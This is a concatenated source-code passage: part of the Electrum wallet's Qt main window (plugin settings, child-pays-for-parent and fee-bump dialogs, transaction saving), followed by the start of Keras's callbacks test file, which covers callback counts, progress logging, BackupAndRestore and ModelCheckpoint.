settings_widgets.pop(name) elif widget is None and p and p.requires_settings() and p.is_enabled(): # plugin got enabled, add widget widget = settings_widgets[name] = p.settings_widget(d) grid.addWidget(widget, i, 1) def do_toggle(cb, name, i): p = plugins.toggle(name) cb.setChecked(bool(p)) enable_settings_widget(p, name, i) # note: all enabled plugins will receive this hook: run_hook('init_qt', self.gui_object) for i, descr in enumerate(plugins.descriptions.values()): full_name = descr['__name__'] prefix, _separator, name = full_name.rpartition('.') p = plugins.get(name) if descr.get('registers_keystore'): continue try: cb = QCheckBox(descr['fullname']) plugin_is_loaded = p is not None cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet) or plugin_is_loaded 
and p.can_user_disable()) cb.setEnabled(cb_enabled) cb.setChecked(plugin_is_loaded and p.is_enabled()) grid.addWidget(cb, i, 0) enable_settings_widget(p, name, i) cb.clicked.connect(partial(do_toggle, cb, name, i)) msg = descr['description'] if descr.get('requires'): msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires'))) grid.addWidget(HelpButton(msg), i, 2) except Exception: self.logger.exception(f"cannot display plugin {name}") grid.setRowStretch(len(plugins.descriptions.values()), 1) vbox.addLayout(Buttons(CloseButton(d))) d.exec_() def cpfp_dialog(self, parent_tx: Transaction) -> None: new_tx = self.wallet.cpfp(parent_tx, 0) total_size = parent_tx.estimated_size() + new_tx.estimated_size() parent_txid = parent_tx.txid() assert parent_txid parent_fee = self.wallet.get_tx_fee(parent_txid) if parent_fee is None: self.show_error(_("Can't CPFP: unknown fee for parent transaction.")) return d = WindowModalDialog(self, _('Child Pays for Parent')) vbox = QVBoxLayout(d) msg = ( "A CPFP is a transaction that sends an unconfirmed output back to " "yourself, with a high fee. The goal is to have miners confirm " "the parent transaction in order to get the fee attached to the " "child transaction.") vbox.addWidget(WWLabel(_(msg))) msg2 = ("The proposed fee is computed using your " "fee/kB settings, applied to the total size of both child and " "parent transactions. After you broadcast a CPFP transaction, " "it is normal to see a new unconfirmed transaction in your history.") vbox.addWidget(WWLabel(_(msg2))) grid = QGridLayout() grid.addWidget(QLabel(_('Total size') + ':'), 0, 0) grid.addWidget(QLabel('%d bytes'% total_size), 0, 1) max_fee = new_tx.output_value() grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0) grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1) output_amount = QLabel('') grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0) grid.addWidget(output_amount, 2, 1) fee_e = BTCAmountEdit(self.get_decimal_point) # FIXME with dyn fees, without estimates, there are all kinds of crashes here combined_fee = QLabel('') combined_feerate = QLabel('') def on_fee_edit(x): fee_for_child = fee_e.get_amount() if fee_for_child is None: return out_amt = max_fee - fee_for_child out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else '' output_amount.setText(out_amt_str) comb_fee = parent_fee + fee_for_child comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else '' combined_fee.setText(comb_fee_str) comb_feerate = comb_fee / total_size * 1000 comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else '' combined_feerate.setText(comb_feerate_str) fee_e.textChanged.connect(on_fee_edit) def get_child_fee_from_total_feerate(fee_per_kb): fee = fee_per_kb * total_size / 1000 - parent_fee fee = min(max_fee, fee) fee = max(total_size, fee) # pay at least 1 sat/byte for combined size return fee suggested_feerate = self.config.fee_per_kb() if suggested_feerate is None: self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''') return fee = get_child_fee_from_total_feerate(suggested_feerate) fee_e.setAmount(fee) grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0) grid.addWidget(fee_e, 3, 1) def on_rate(dyn, pos, fee_rate): fee = get_child_fee_from_total_feerate(fee_rate) fee_e.setAmount(fee) fee_slider = FeeSlider(self, self.config, on_rate) fee_combo = FeeComboBox(fee_slider) fee_slider.update() grid.addWidget(fee_slider, 4, 1) 
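# Illustrative numbers only (not taken from the dialog above): with
# total_size = 400 bytes, parent_fee = 500 sat and a target rate of
# 5000 sat/kvB, get_child_fee_from_total_feerate returns
# 5000 * 400 / 1000 - 500 = 1500 sat for the child transaction, clamped to at
# most max_fee (the full child input) and to at least total_size, i.e. no less
# than 1 sat/byte over the combined parent+child size.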
grid.addWidget(fee_combo, 4, 2) grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0) grid.addWidget(combined_fee, 5, 1) grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0) grid.addWidget(combined_feerate, 6, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return fee = fee_e.get_amount() if fee is None: return # fee left empty, treat is as "cancel" if fee > max_fee: self.show_error(_('Max fee exceeded')) return try: new_tx = self.wallet.cpfp(parent_tx, fee) except CannotCPFP as e: self.show_error(str(e)) return self.show_transaction(new_tx) def _add_info_to_tx_from_wallet_and_network(self, tx: PartialTransaction) -> bool: """Returns whether successful.""" # note side-effect: tx is being mutated assert isinstance(tx, PartialTransaction) try: # note: this might download input utxos over network BlockingWaitingDialog( self, _("Adding info to tx, from wallet and network..."), lambda: tx.add_info_from_wallet(self.wallet, ignore_network_issues=False), ) except NetworkException as e: self.show_error(repr(e)) return False return True def bump_fee_dialog(self, tx: Transaction): txid = tx.txid() if not isinstance(tx, PartialTransaction): tx = PartialTransaction.from_tx(tx) if not self._add_info_to_tx_from_wallet_and_network(tx): return d = BumpFeeDialog(main_window=self, tx=tx, txid=txid) d.run() def dscancel_dialog(self, tx: Transaction): txid = tx.txid() if not isinstance(tx, PartialTransaction): tx = PartialTransaction.from_tx(tx) if not self._add_info_to_tx_from_wallet_and_network(tx): return d = DSCancelDialog(main_window=self, tx=tx, txid=txid) d.run() def save_transaction_into_wallet(self, tx: Transaction): win = self.top_level_window() try: if not self.wallet.add_transaction(tx): win.show_error(_("Transaction could not be saved.") + "\n" + _("It conflicts with current history.")) return False except AddTransactionException as e: win.show_error(e) return False else: self.wallet.save_db() # need to update at least: history_list, utxo_list, address_list self.need_update.set() msg = (_("Transaction added to wallet history.") + '\n\n' + _("Note: this is an offline transaction, if you want the network " "to see it, you need to broadcast it.")) win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg) return True def show_cert_mismatch_error(self): if self.showing_cert_mismatch_error: return self.showing_cert_mismatch_error = True self.show_critical(title=_("Certificate mismatch"), msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" + _("Electrum will now exit.")) self.showing_cert_mismatch_error = False self.close()
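# A minimal sketch (hypothetical helper, not part of this file) of the
# WaitingDialog pattern used throughout this window (sign_tx_with_password,
# broadcast_transaction, sweep_key_dialog, open_channel): `task` is a
# zero-argument callable run off the GUI thread, `on_success` receives its
# return value, and `on_failure` receives the exc_info tuple.
def _example_background_fee_lookup(window, txid):
    def task():
        # Runs off the GUI thread; the return value is handed to on_success.
        return window.wallet.get_tx_fee(txid)

    def on_success(fee):
        msg = _('Unknown fee') if fee is None else window.format_amount_and_units(fee)
        window.show_message(msg)

    def on_failure(exc_info):
        window.on_error(exc_info)

    WaitingDialog(window, _('Looking up fee...'), task, on_success, on_failure)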
callbacks_test.py
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for Keras callbacks.""" import collections import csv import json import os import re import shutil import sys import threading import time import unittest from unittest import mock from absl.testing import parameterized import keras from keras.callbacks import BackupAndRestore from keras.callbacks import BackupAndRestoreExperimental from keras.engine import sequential from keras.layers import Activation from keras.layers import Dense from keras.optimizers.optimizer_v2 import gradient_descent from keras.optimizers.schedules import learning_rate_schedule from keras.testing_infra import test_combinations from keras.testing_infra import test_utils from keras.utils import io_utils from keras.utils import np_utils import numpy as np import tensorflow.compat.v2 as tf from tensorflow.python.platform import tf_logging as logging try: import h5py # pylint:disable=g-import-not-at-top except ImportError: h5py = None try: import requests # pylint:disable=g-import-not-at-top except ImportError: requests = None TRAIN_SAMPLES = 10 TEST_SAMPLES = 10 NUM_CLASSES = 2 INPUT_DIM = 3 NUM_HIDDEN = 5 BATCH_SIZE = 5 CALLBACK_HOOKS = [ 'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end', 'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin', 'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end', 'on_test_begin', 'on_test_end', 'on_train_batch_begin', 'on_train_batch_end', 'on_train_begin', 'on_train_end' ] class Counter(keras.callbacks.Callback): """Counts the number of times each callback method was run. Attributes: method_counts: dict. Contains the counts of time each callback method was run. 
""" def __init__(self): self.method_counts = collections.defaultdict(int) for method_name in CALLBACK_HOOKS: setattr(self, method_name, self.wrap_with_counts(method_name, getattr(self, method_name))) def wrap_with_counts(self, method_name, method): def _call_and_count(*args, **kwargs): self.method_counts[method_name] += 1 return method(*args, **kwargs) return _call_and_count class CallAllHooks(keras.callbacks.Callback): """A callback that calls self._run for all hooks""" def __init__(self): for method_name in CALLBACK_HOOKS: setattr(self, method_name, self._run) def _run(self, *args, logs=None): raise NotImplementedError def _get_numpy(): return np.ones((10, 10)), np.ones((10, 1)) def _get_sequence(): class MySequence(keras.utils.data_utils.Sequence): def __getitem__(self, _): return np.ones((2, 10)), np.ones((2, 1)) def __len__(self): return 5 return MySequence(), None @test_combinations.run_with_all_model_types @test_combinations.run_all_keras_modes class CallbackCountsTest(test_combinations.TestCase): def _check_counts(self, counter, expected_counts): """Checks that the counts registered by `counter` are those expected.""" for method_name, expected_count in expected_counts.items(): self.assertEqual( counter.method_counts[method_name], expected_count, msg='For method {}: expected {}, got: {}'.format( method_name, expected_count, counter.method_counts[method_name])) def _get_model(self): layers = [ keras.layers.Dense(10, activation='relu'), keras.layers.Dense(1, activation='sigmoid') ] model = test_utils.get_model_from_layers(layers, input_shape=(10,)) model.compile( tf.compat.v1.train.AdamOptimizer(0.001), 'binary_crossentropy', run_eagerly=test_utils.should_run_eagerly()) return model @parameterized.named_parameters(('with_numpy', _get_numpy()), ('with_sequence', _get_sequence())) def test_callback_hooks_are_called_in_fit(self, data): if not tf.executing_eagerly(): self.skipTest('Behavior changed in v2.') x, y = data val_x, val_y = np.ones((4, 10)), np.ones((4, 1)) model = self._get_model() counter = Counter() model.fit( x, y, validation_data=(val_x, val_y), batch_size=2, steps_per_epoch=5, epochs=5, callbacks=[counter]) self._check_counts( counter, { 'on_batch_begin': 25, 'on_batch_end': 25, 'on_epoch_begin': 5, 'on_epoch_end': 5, 'on_predict_batch_begin': 0, 'on_predict_batch_end': 0, 'on_predict_begin': 0, 'on_predict_end': 0, 'on_test_batch_begin': 10, 'on_test_batch_end': 10, 'on_test_begin': 5, 'on_test_end': 5, 'on_train_batch_begin': 25, 'on_train_batch_end': 25, 'on_train_begin': 1, 'on_train_end': 1 }) @parameterized.named_parameters(('with_numpy', _get_numpy()), ('with_sequence', _get_sequence())) def test_callback_hooks_are_called_in_evaluate(self, data): x, y = data is_sequence = isinstance(x, keras.utils.data_utils.Sequence) model = self._get_model() counter = Counter() model.evaluate( x, y, batch_size=2 if not is_sequence else None, steps=5 if is_sequence else None, callbacks=[counter]) self._check_counts( counter, { 'on_test_batch_begin': 5, 'on_test_batch_end': 5, 'on_test_begin': 1, 'on_test_end': 1 }) @parameterized.named_parameters(('with_numpy', _get_numpy()), ('with_sequence', _get_sequence())) def test_callback_hooks_are_called_in_predict(self, data): x = data[0] is_sequence = isinstance(x, keras.utils.data_utils.Sequence) model = self._get_model() counter = Counter() model.predict( x, batch_size=2 if not is_sequence else None, steps=5 if is_sequence else None, callbacks=[counter]) self._check_counts( counter, { 'on_predict_batch_begin': 5, 'on_predict_batch_end': 
5, 'on_predict_begin': 1, 'on_predict_end': 1 }) def test_callback_list_methods(self): counter = Counter() callback_list = keras.callbacks.CallbackList([counter]) batch = 0 callback_list.on_test_batch_begin(batch) callback_list.on_test_batch_end(batch) callback_list.on_predict_batch_begin(batch) callback_list.on_predict_batch_end(batch) self._check_counts( counter, { 'on_test_batch_begin': 1, 'on_test_batch_end': 1, 'on_predict_batch_begin': 1, 'on_predict_batch_end': 1 }) class KerasCallbacksTest(test_combinations.TestCase): def _get_model(self, input_shape=None, additional_metrics=None): additional_metrics = additional_metrics or [] layers = [ keras.layers.Dense(3, activation='relu'), keras.layers.Dense(2, activation='softmax') ] model = test_utils.get_model_from_layers(layers, input_shape=input_shape) model.compile( loss='mse', optimizer='rmsprop', metrics=[keras.metrics.CategoricalAccuracy(name='my_acc')] + additional_metrics, run_eagerly=test_utils.should_run_eagerly()) return model @test_combinations.run_with_all_model_types @test_combinations.run_all_keras_modes def test_progbar_logging(self): model = self._get_model(input_shape=(3,)) x = tf.ones((200, 3)) y = tf.zeros((200, 2)) dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10) expected_log = r'(.*- loss:.*- my_acc:.*)+' io_utils.enable_interactive_logging() with self.captureWritesToStream(sys.stdout) as printed: model.fit(dataset, epochs=2, steps_per_epoch=10) self.assertRegex(printed.contents(), expected_log) @test_combinations.run_with_all_model_types @test_combinations.run_all_keras_modes def test_progbar_logging_with_stateful_metrics(self): class AddAllOnes(keras.metrics.Metric): """A simple metric that adds all the one's in `y_true`.""" def __init__(self, name='add_all_ones', **kwargs): super(AddAllOnes, self).__init__(name=name, **kwargs) self.total = self.add_weight(name='total', initializer='zeros') def update_state(self, y_true, y_pred, sample_weight=None): self.total.assign_add( tf.cast(tf.reduce_sum(y_true), dtype=tf.float32)) def result(self): return self.total x_train = np.array([[0, 1, 0, 1, 0, 1, 0, 1]] * 8).astype(float) y_train = np.array([[1, 0], [0, 0], [1, 1], [1, 0], [0, 1], [1, 0], [1, 0], [0, 0]]) # There are 7 ones in total in `y_train` after two batches. expected_log = r'(.*- loss:.*- my_acc:.*- add_all_ones: 7.0000)+' io_utils.enable_interactive_logging() with self.captureWritesToStream(sys.stdout) as printed: model = self._get_model( input_shape=(8,), additional_metrics=[AddAllOnes()]) model.fit(x_train, y_train, verbose=1, batch_size=4, shuffle=False) self.assertRegex(printed.contents(), expected_log) # When not executing eagerly, `model.evaluate` does not have the metrics # results printed. 
if tf.executing_eagerly(): with self.captureWritesToStream(sys.stdout) as printed: model = self._get_model( input_shape=(8,), additional_metrics=[AddAllOnes()]) model.evaluate(x_train, y_train, verbose=1, batch_size=4) self.assertRegex(printed.contents(), expected_log) @test_combinations.run_all_keras_modes def test_trivial_backup_restore(self): if test_utils.should_run_eagerly(): model = keras.Sequential([keras.layers.Dense(1)]) model.compile('sgd', 'mse') cbk = BackupAndRestore(self.get_temp_dir()) model.fit(np.ones((10, 1)), np.ones((10, 1)), epochs=0, callbacks=[cbk]) def test_backup_restore_train_counter(self): if not tf.compat.v1.executing_eagerly(): self.skipTest('BackupAndRestore only available when execution is enabled') model = keras.Sequential([keras.layers.Dense(1)]) model.compile('sgd', 'mse') cbk = BackupAndRestore(self.get_temp_dir()) class InterruptingCallback(keras.callbacks.Callback): """A callback to intentionally introduce interruption to training.""" def on_epoch_end(self, epoch, log=None): logging.info(f'counter: {model._train_counter}') if epoch == 5 or epoch == 12: raise RuntimeError('Interruption') log_dir = self.get_temp_dir() # The following asserts that the train counter is fault tolerant. self.assertEqual(model._train_counter.numpy(), 0) try: model.fit(np.ones((10, 1)), np.ones((10, 1)), epochs=20, callbacks=[cbk, InterruptingCallback()]) except RuntimeError: pass self.assertEqual(model._train_counter.numpy(), 6) try: model.fit(np.ones((10, 1)), np.ones((10, 1)), epochs=20, callbacks=[cbk, InterruptingCallback()]) except RuntimeError: pass self.assertEqual(model._train_counter.numpy(), 13) def _test_backup_and_restore_callback_with(self, cls): if not tf.compat.v1.executing_eagerly(): self.skipTest('BackupAndRestore only available when execution is enabled') class InterruptingCallback(keras.callbacks.Callback): """A callback to intentionally introduce interruption to training.""" def on_epoch_end(self, epoch, log=None): if epoch == 15: raise RuntimeError('Interruption') model = keras.Sequential([keras.layers.Dense(10)]) optimizer = gradient_descent.SGD() model.compile(optimizer, loss='mse') x = tf.random.uniform((24, 10)) y = tf.random.uniform((24,)) dataset = tf.data.Dataset.from_tensor_slices((x, y)).repeat().batch(2) backup_callback = cls(backup_dir=self.get_temp_dir()) try: model.fit( dataset, epochs=20, steps_per_epoch=5, callbacks=[backup_callback, InterruptingCallback()]) except RuntimeError: logging.warning('***Handling interruption***') # This continues at the epoch where it left off. 
model.fit( dataset, epochs=20, steps_per_epoch=5, callbacks=[backup_callback]) def test_experimental_backup_and_restore(self): """Ensure the legacy endpoint of `BackupAndRestore` gives warning.""" warning_messages = [] def warning(msg): warning_messages.append(msg) with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning): self._test_backup_and_restore_callback_with(BackupAndRestoreExperimental) warning_msg = ('`tf.keras.callbacks.experimental.BackupAndRestore` ' 'endpoint is deprecated') self.assertIn(warning_msg, '\n'.join(warning_messages)) warning_msg = ('***Handling interruption***') self.assertIn(warning_msg, '\n'.join(warning_messages)) def test_backup_and_restore(self): """Ensure the public endpoint of `BackupAndRestore` is working.""" warning_messages = [] def warning(msg): warning_messages.append(msg) with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning): self._test_backup_and_restore_callback_with(BackupAndRestore) warning_msg = ('`tf.keras.callbacks.experimental.BackupAndRestore` ' 'endpoint is deprecated') self.assertNotIn(warning_msg, '\n'.join(warning_messages)) warning_msg = ('***Handling interruption***') self.assertIn(warning_msg, '\n'.join(warning_messages)) @test_combinations.run_all_keras_modes def test_callback_warning(self): class SleepCallback(keras.callbacks.Callback): def on_train_batch_end(self, batch, logs=None): time.sleep(0.1) model = sequential.Sequential() model.add(keras.layers.Dense(1)) model.compile( 'sgd', loss='mse', run_eagerly=test_utils.should_run_eagerly()) warning_messages = [] def warning(msg): warning_messages.append(msg) with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning): model.fit( np.ones((16, 1), 'float32'), np.ones((16, 1), 'float32'), batch_size=3, epochs=1, callbacks=[SleepCallback()]) warning_msg = ('Callback method `on_train_batch_end` is slow compared ' 'to the batch time') self.assertIn(warning_msg, '\n'.join(warning_messages)) @test_combinations.run_all_keras_modes def test_default_callbacks_no_warning(self): # Test that without the callback no warning is raised model = sequential.Sequential() model.add(keras.layers.Dense(1)) model.compile( 'sgd', loss='mse', run_eagerly=test_utils.should_run_eagerly()) warning_messages = [] def warning(msg): warning_messages.append(msg) with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning): model.fit( np.ones((16, 1), 'float32'), np.ones((16, 1), 'float32'), batch_size=3, epochs=1) self.assertListEqual(warning_messages, []) @test_combinations.run_with_all_model_types(exclude_models='functional') @test_combinations.run_all_keras_modes def test_progbar_logging_deferred_model_build(self): model = self._get_model() self.assertFalse(model.built) x = tf.ones((200, 3)) y = tf.zeros((200, 2)) dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10) expected_log = r'(.*- loss:.*- my_acc:.*)+' io_utils.enable_interactive_logging() with self.captureWritesToStream(sys.stdout) as printed: model.fit(dataset, epochs=2, steps_per_epoch=10) self.assertRegex(printed.contents(), expected_log) @test_combinations.run_with_all_model_types @test_combinations.run_all_keras_modes def test_progbar_logging_validation_data(self): model = self._get_model(input_shape=(3,)) x = tf.ones((50, 3)) y = tf.zeros((50, 2)) training_dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10) val_dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10) expected_log = r'(.*5/5.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*)+' 
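    # 50 samples batched in groups of 10 give 5 steps per epoch, hence the
    # `5/5` expected in the progress-bar output matched above.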
io_utils.enable_interactive_logging() with self.captureWritesToStream(sys.stdout) as printed: model.fit(training_dataset, epochs=2, validation_data=val_dataset) self.assertRegex(printed.contents(), expected_log) @test_combinations.run_with_all_model_types @test_combinations.run_all_keras_modes(always_skip_v1=True) def test_progbar_logging_validation_split(self): model = self._get_model(input_shape=(3,)) x = np.ones((100, 3)) y = np.zeros((100, 2)) expected_log = ( r'(?s).*1/2.*8/8.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:' r'.*2/2.*8/8.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*') io_utils.enable_interactive_logging() with self.captureWritesToStream(sys.stdout) as printed: model.fit(x, y, batch_size=10, epochs=2, validation_split=0.2) self.assertRegex(printed.contents(), expected_log) @test_combinations.run_with_all_model_types @test_combinations.run_all_keras_modes(always_skip_v1=True) def test_progbar_logging_training_validation(self): model = self._get_model(input_shape=(2,)) def generator(): for _ in range(100): yield [1, 1], 1 training = tf.data.Dataset \ .from_generator( generator=generator, output_types=('float64', 'float64'), output_shapes=([2], [])) \ .batch(2) \ .repeat() validation = tf.data.Dataset \ .from_generator( generator=generator, output_types=('float64', 'float64'), output_shapes=([2], [])) \ .batch(2) expected_log = ( r'(?s).*1/2.*20/20.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:' r'.*2/2.*20/20.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*') io_utils.enable_interactive_logging() with self.captureWritesToStream(sys.stdout) as printed: model.fit( x=training, validation_data=validation, epochs=2, steps_per_epoch=20) self.assertRegex(printed.contents(), expected_log) @test_combinations.run_with_all_model_types @test_combinations.run_all_keras_modes(always_skip_v1=True) def test_progbar_logging_with_dataset_and_partial_batch(self): model = self._get_model(input_shape=(2,)) def generator(): # Have a partial batch at the end. for _ in range(9): yield np.random.random(2), 1 training = tf.data.Dataset \ .from_generator( generator=generator, output_types=('float64', 'float64'), output_shapes=([2], [])) \ .batch(2) validation = tf.data.Dataset \ .from_generator( generator=generator, output_types=('float64', 'float64'), output_shapes=([2], [])) \ .batch(2) io_utils.enable_interactive_logging() with self.captureWritesToStream(sys.stdout) as printed: model.fit(x=training, validation_data=validation) # Make sure the value of val_ metrics are not zeros. log_content = printed.contents() val_loss = re.findall(r'val_loss: (\d\.\d+)', log_content) self.assertLen(val_loss, 1) self.assertGreater(float(val_loss[0]), 0.0) @test_combinations.run_with_all_model_types def test_ModelCheckpoint(self): if h5py is None: return # Skip test if models cannot be saved. model_type = test_utils.get_model_type() if model_type == 'subclass': return # Skip test since subclassed models cannot be saved in .h5 format. 
if not tf.__internal__.tf2.enabled(): self.skipTest('Checkpoint callback only available in v2.') layers = [ keras.layers.Dense(NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'), keras.layers.Dense(NUM_CLASSES, activation='softmax') ] model = test_utils.get_model_from_layers(layers, input_shape=(3,)) model.compile( loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc']) temp_dir = self.get_temp_dir() self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True) filepath = os.path.join(temp_dir, 'checkpoint.h5') (x_train, y_train), (x_test, y_test) = test_utils.get_test_data( train_samples=TRAIN_SAMPLES, test_samples=TEST_SAMPLES, input_shape=(INPUT_DIM,), num_classes=NUM_CLASSES) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) # Case 1 monitor = 'val_loss' save_best_only = False mode = 'auto' cbks = [ keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, mode=mode) ] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=1, verbose=0) assert os.path.exists(filepath) os.remove(filepath) # Case 2 mode = 'min' cbks = [ keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, mode=mode) ] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=1, verbose=0) assert os.path.exists(filepath) os.remove(filepath) # Case 3 mode = 'max' monitor = 'val_acc' cbks = [ keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, mode=mode) ] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=1, verbose=0) assert os.path.exists(filepath) os.remove(filepath) # Case 4 save_best_only = True cbks = [ keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, mode=mode) ] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=1, verbose=0) assert os.path.exists(filepath) os.remove(filepath) # Case 5: metric not available. cbks = [ keras.callbacks.ModelCheckpoint( filepath, monitor='unknown', save_best_only=True) ] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=1, verbose=0) # File won't be written. assert not os.path.exists(filepath) # Case 6 save_best_only = False period = 2 mode = 'auto' filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5') cbks = [ keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, mode=mode, period=period) ] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=4, verbose=1) assert os.path.exists(filepath.format(epoch=2)) assert os.path.exists(filepath.format(epoch=4)) os.remove(filepath.format(epoch=2)) os.remove(filepath.format(epoch=4)) assert not os.path.exists(filepath.format(epoch=1)) assert not os.path.exists(filepath.format(epoch=3)) # Invalid use: this will raise a warning but not an Exception. keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, mode='unknown') # Case 7: `ModelCheckpoint` with a combination of `save_freq` and `period`. # Though `period` is deprecated, we're testing it for # backward-compatibility. 
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5') cbks = [ keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, mode=mode, save_freq='epoch', period=5) ] assert not os.path.exists(filepath.format(epoch=0)) assert not os.path.exists(filepath.format(epoch=5)) model.fit( x_train, y_train, batch_size=2, validation_data=(x_test, y_test), callbacks=cbks, epochs=10, verbose=1) assert not os.path.exists(filepath.format(epoch=1)) assert not os.path.exists(filepath.format(epoch=2)) assert not os.path.exists(filepath.format(epoch=3)) assert not os.path.exists(filepath.format(epoch=4)) assert os.path.exists(filepath.format(epoch=5)) assert not os.path.exists(filepath.format(epoch=6)) assert os.path.exists(filepath.format(epoch=10)) os.remove(filepath.format(epoch=5)) os.remove(filepath.format(epoch=10)) # Case 8: `ModelCheckpoint` with an integer `save_freq` filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5') cbks = [ keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, mode=mode, save_freq=15, period=100) # The period should be ignored (this test tests this). ] assert not os.path.exists(filepath.format(epoch=3)) model.fit( x_train, y_train, batch_size=2, validation_data=(x_test, y_test), callbacks=cbks, epochs=10, verbose=1) assert not os.path.exists(filepath.format(epoch=1)) assert not os.path.exists(filepath.format(epoch=2)) assert os.path.exists(filepath.format(epoch=3)) assert not os.path.exists(filepath.format(epoch=4)) assert not os.path.exists(filepath.format(epoch=5)) assert os.path.exists(filepath.format(epoch=6)) assert not os.path.exists(filepath.format(epoch=7)) assert not os.path.exists(filepath.format(epoch=8)) assert os.path.exists(filepath.format(epoch=9)) os.remove(filepath.format(epoch=3)) os.remove(filepath.format(epoch=6)) os.remove(filepath.format(epoch=9)) # Case 9: `ModelCheckpoint` with valid and invalid save_freq argument. with self.assertRaisesRegex(ValueError, 'Unrecognized save_freq'): keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, mode=mode, save_freq='invalid_save_freq') # The following should not raise ValueError. keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, mode=mode, save_freq='epoch') keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, mode=mode, save_freq=3) # Case 10: `ModelCheckpoint` with valid and invalid `options` argument. with self.assertRaisesRegex(TypeError, 'tf.train.CheckpointOptions'): keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, save_weights_only=True, mode=mode, options=tf.saved_model.SaveOptions()) with self.assertRaisesRegex(TypeError, 'tf.saved_model.SaveOptions'): keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, save_weights_only=False, mode=mode, options=tf.train.CheckpointOptions()) keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, save_weights_only=True, mode=mode, options=tf.train.CheckpointOptions()) keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, save_weights_only=False, mode=mode, options=tf.saved_model.SaveOptions()) # Case 11: `ModelCheckpoint` save model with batch number in filename. 
